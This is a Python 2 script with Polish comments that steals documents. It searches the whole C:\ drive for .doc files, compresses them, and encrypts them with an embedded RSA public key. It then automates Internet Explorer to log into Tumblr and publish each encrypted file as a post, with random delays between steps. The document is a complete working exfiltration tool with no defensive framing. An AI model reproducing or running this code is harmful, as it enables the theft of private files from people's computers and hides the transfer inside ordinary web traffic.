# -*- coding: utf-8 -*-
import win32com.client
import os
import fnmatch
import time
import random
import zlib

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

doc_type   = ".doc"
username   = "test@test.com"
password   = "testpassword"

public_key = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyXUTgFoL/2EPKoN31l5T
lak7VxhdusNCWQKDfcN5Jj45GQ1oZZjsECQ8jK5AaQuCWdmEQkgCEV23L2y71G+T
h/zlVPjp0hgC6nOKOuwmlQ1jGvfVvaNZ0YXrs+sX/wg5FT/bTS4yzXeW6920tdls
2N7Pu5N1FLRW5PMhk6GW5rzVhwdDvnfaUoSVj7oKaIMLbN/TENvnwhZZKlTZeK79
ix4qXwYLe66CrgCHDf4oBJ/nO1oYwelxuIXVPhIZnVpkbz3IL6BfEZ3ZDKzGeRs6
YLZuR2u5KUbr9uabEzgtrLyOeoK8UscKmzOvtwxZDcgNijqMJKuqpNZczPHmf9cS
1wIDAQAB
-----END PUBLIC KEY-----"""


def wait_for_browser(browser):

    # czeka a przegldarka skoczy adowanie strony
    while browser.ReadyState != 4 and browser.ReadyState != "complete":    
        time.sleep(0.1)

    return

def encrypt_string(plaintext):

    chunk_size = 256

    print "Kompresowanie: %d bajtw" % len(plaintext)

    plaintext = zlib.compress(plaintext)

    print "Szyfrowanie %d bajtw" % len(plaintext)

    rsakey = RSA.importKey(public_key)
    rsakey = PKCS1_OAEP.new(rsakey)

    encrypted = ""
    offset    = 0

    while offset < len(plaintext):

        chunk = plaintext[offset:offset+256]

        if len(chunk) % chunk_size != 0:
            chunk += " " * (chunk_size - len(chunk))

        encrypted += rsakey.encrypt(chunk)
        offset    += chunk_size


    encrypted = encrypted.encode("base64")
    print "Szyfr Base64: %d" % len(encrypted)
    return encrypted

def encrypt_post(filename):

    # otwarcie i odczytanie pliku
    fd = open(filename,"rb")
    contents = fd.read()
    fd.close()

    encrypted_title = encrypt_string(filename)
    encrypted_body  = encrypt_string(contents)


    return encrypted_title,encrypted_body

def random_sleep():
    time.sleep(random.randint(5,10))
    return

def login_to_tumblr(ie):

    # pobranie wszystkich elementw z dokumentu
    full_doc = ie.Document.all

    # iteracyjne poszukiwanie formularza wylogowywania
    for i in full_doc:
        if i.id == "signup_email":
            i.setAttribute("value",username)
        elif i.id == "signup_password":
            i.setAttribute("value",password)

    random_sleep()

    # strona gwna moe rnie wyglda
    try:
        if ie.Document.forms[0].id == "signup_form":
            ie.Document.forms[0].submit()
        else:
            ie.Document.forms[1].submit()
    except IndexError, e:
        pass

    random_sleep()

    # formularz logowania jest drugi na stronie
    wait_for_browser(ie)

    return

def post_to_tumblr(ie,title,post):

    full_doc = ie.Document.all

    for i in full_doc:
        if i.id == "post_one":
            i.setAttribute("value",title)
            title_box = i
            i.focus()
        elif i.id == "post_two":
            i.setAttribute("innerHTML",post)
            print "Ustawienie obszaru tekstowego"
            i.focus()
        elif i.id == "create_post":
            print "Znaleziono przycisk zatwierdzania"
            post_form = i
            i.focus()

    # zdjcie fokusu z gwnego pola treci
    random_sleep()    
    title_box.focus()
    random_sleep()

    # wysanie formularza
    post_form.children[0].click()
    wait_for_browser(ie)

    random_sleep()

    return

def exfiltrate(document_path):

    ie = win32com.client.Dispatch("InternetExplorer.Application")
    ie.Visible = 1

    # przejcie do portalu Tumblr i zalogowanie si
    ie.Navigate("http://www.tumblr.com/login")
    wait_for_browser(ie)

    print "Logowanie..."
    login_to_tumblr(ie)
    print "Zalogowano..."

    ie.Navigate("https://www.tumblr.com/new/text")
    wait_for_browser(ie)

    # szyfrowanie pliku
    title,body = encrypt_post(document_path)

    print "Tworzenie nowego wpisu..."
    post_to_tumblr(ie,title,body)
    print "Opublikowano!"

    # skasowanie instancji przegldarki IE
    ie.Quit()
    ie = None

    return

# gwna ptla wykrywania dokumentw
for parent, directories, filenames in os.walk("C:\\"):
    for filename in fnmatch.filter(filenames,"*%s" % doc_type):
        document_path = os.path.join(parent,filename)
        print "Znaleziono: %s" % document_path
        exfiltrate(document_path)
        raw_input("Kontynuowa?")